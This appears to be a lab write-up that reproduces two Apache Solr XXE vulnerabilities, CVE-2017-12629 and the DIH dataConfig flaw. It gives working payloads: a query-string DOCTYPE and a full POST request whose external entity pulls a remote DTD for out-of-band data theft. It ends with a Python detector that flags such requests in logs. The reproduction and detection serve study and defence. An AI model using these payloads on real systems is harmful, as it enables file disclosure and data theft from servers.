Summary: set up remote debugging in IDEA and reproduce only two XXE vulnerabilities.
Go to the lucene-solr\solr\bin folder and run:
solr start -p 8988 -f -a "-Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=8988"
In IDEA, configure: -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=8988
Vulnerability reproduction
Only two XXE vulnerabilities are reproduced.
CVE-2017-12629
solr create -c test # create the core "test"
Payload:
http://localhost:8988/solr/test/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://localhost:4444/executed"><a></a>'}
Solr DIH dataConfig parameter XXE vulnerability
solr create -c test # create the core "test"
Payload request:
POST /solr/test/dataimport?_=1551604400819&indent=on&wt=json HTTP/1.1
Host: 127.0.0.1:8988
Pragma: no-cache
Origin: http://127.0.0.1:8988
Accept-Language: zh-CN,zh;q=0.9
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36
Content-type: application/x-www-form-urlencoded
Accept: application/json, text/plain, */*
Cache-Control: no-cache
Referer: http://127.0.0.1:8988/solr/
Connection: close
Content-Length: 269

command=full-import&verbose=false&clean=true&commit=true&optimize=false&core=test&dataConfig=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22%3F%3E %3C!DOCTYPE+root+%5B%3C!ENTITY+%25+remote+SYSTEM+%22http%3A%2F%2F127.0.0.1:8082%2Fftp_xxe.xml%22%3E%25remote%3B%5D%3E
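For triage of Solr access logs or proxy captures, the two request shapes reproduced above can be flagged by decoding the parameters and looking for a DTD declaration. This is an added example, not code from the original article or from the Solr project; the function name, finding labels and sample requests are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# A DTD declaration is never needed in a client-supplied Solr query or DIH config.
DTD_RE = re.compile(r"<!\s*(DOCTYPE|ENTITY)\b", re.IGNORECASE)
XMLPARSER_RE = re.compile(r"\{!\s*xmlparser\b", re.IGNORECASE)


def classify(target, body=""):
    """Return (label, parameter) findings for one request; empty list if clean."""
    parts = urlsplit(target)
    # parse_qs percent-decodes once, the same view the server has of the parameters.
    params = parse_qs(parts.query, keep_blank_values=True)
    for name, values in parse_qs(body, keep_blank_values=True).items():
        params.setdefault(name, []).extend(values)
    findings = []
    for name, values in params.items():
        for value in values:
            if not DTD_RE.search(value):
                continue
            if XMLPARSER_RE.search(value):
                findings.append(("xmlparser-dtd", name))       # CVE-2017-12629 shape
            elif name == "dataConfig" and parts.path.endswith("/dataimport"):
                findings.append(("dih-dataconfig-dtd", name))  # DIH dataConfig shape
            else:
                findings.append(("dtd-in-parameter", name))
    return findings


# Constructed samples: (request target, form body). The first two are shortened,
# percent-encoded forms of the two requests shown on this page; the third is benign.
SAMPLES = [
    ("/solr/test/select?q=%7B!xmlparser%20v%3D'%3C!DOCTYPE%20a%20SYSTEM%20"
     "%22http%3A%2F%2Flocalhost%3A4444%2Fexecuted%22%3E%3Ca%3E%3C%2Fa%3E'%7D", ""),
    ("/solr/test/dataimport?indent=on&wt=json",
     "command=full-import&core=test&dataConfig=%3C!DOCTYPE+root+%5B%3C!ENTITY+%25+remote"
     "+SYSTEM+%22http%3A%2F%2F127.0.0.1:8082%2Fftp_xxe.xml%22%3E%25remote%3B%5D%3E"),
    ("/solr/test/select?q=title%3Asolr&wt=json", ""),
]

if __name__ == "__main__":
    for target, body in SAMPLES:
        print(classify(target, body) or "clean", "<-", target[:40])
```

A hit on either of the first two labels means the request carried a DTD into an XML parser entry point and the outbound connections from the Solr host around that timestamp are worth reviewing.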